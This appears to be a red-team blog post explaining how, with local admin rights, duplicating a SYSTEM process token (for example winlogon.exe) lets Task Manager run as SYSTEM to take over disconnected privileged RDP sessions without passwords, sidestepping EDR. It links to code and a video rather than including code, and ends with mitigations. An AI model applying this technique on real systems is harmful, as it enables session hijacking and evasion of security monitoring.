TL;DR: Dumping credentials from LSASS may not always be trivial due to the presence of EDR products, and bypassing such products may not always be trivial. As an alternative, disconnected user sessions can be entered without knowing the password of the user, when Task Manager can be launched in SYSTEM context. This post illustrates the Token Duplication technique that may be used to duplicate a process token from a process running as SYSTEM, in order to start an instance of Task Manager as SYSTEM, such that the victim user session can be entered without knowing the user’s password.
Background
This post is a continuation from the “Alternative to LSASS dumping” post that discuss the technique of using DLL search-order hijacking to get malware executed in a high-privileged victim user’s context, as an alternative to dump the memory of LSASS.
On a red team engagement, we observed indicators of highly-privileged users having authenticated against the compromised host after the last reboot.
Therefore, we deemed it likely that their credentials were still cached in the LSASS process memory space, ripe for dumping since we already had gained local administrative privileges on the host. However, as we believed that the present EDR solution was found to detect available dumping techniques, alternatives were explored.
We observed that RDP sessions of high-privileged users were left disconnected, however without the password of the user, we couldn’t enter their session, unless we could get an instance of Task Manager to run in SYSTEM context.
PsExec
We evaluated the viability of using PsExec to create a temporary service running as SYSTEM to instantiate Task Manager in SYSTEM context, but abandoned the idea, as we deemed it likely that service creation was heavily monitored.
Token Duplication
We evaluated the viability of using the well-known Token Duplication technique, to instantiate Task Manager in SYSTEM context, and decided to proceed with the technique, and ended up with the following C# application below to do so.
In brief, the technique works by accessing the token of a process running in SYSTEM context, e.g. winlogon.exe, duplicating it, and then using it to create a new instance of Task Manager in SYSTEM context. With Task Manager running as SYSTEM, connecting to disconnected privileged sessions is trivial.
A video demonstration of the attack can be seen here: https://www.youtube.com/watch?v=UmwW0fpPBSg
Source code is available at: https://github.com/magnusstubman/tokenduplicator/
Mitigations
Primary mitigations should consist of constraining user privileges such that as few people as possible have administrative rights. Secondary mitigations should consist of monitoring the usage of the sensitive Win32 APIs used in the code sample above, and alert upon potential malicious usage.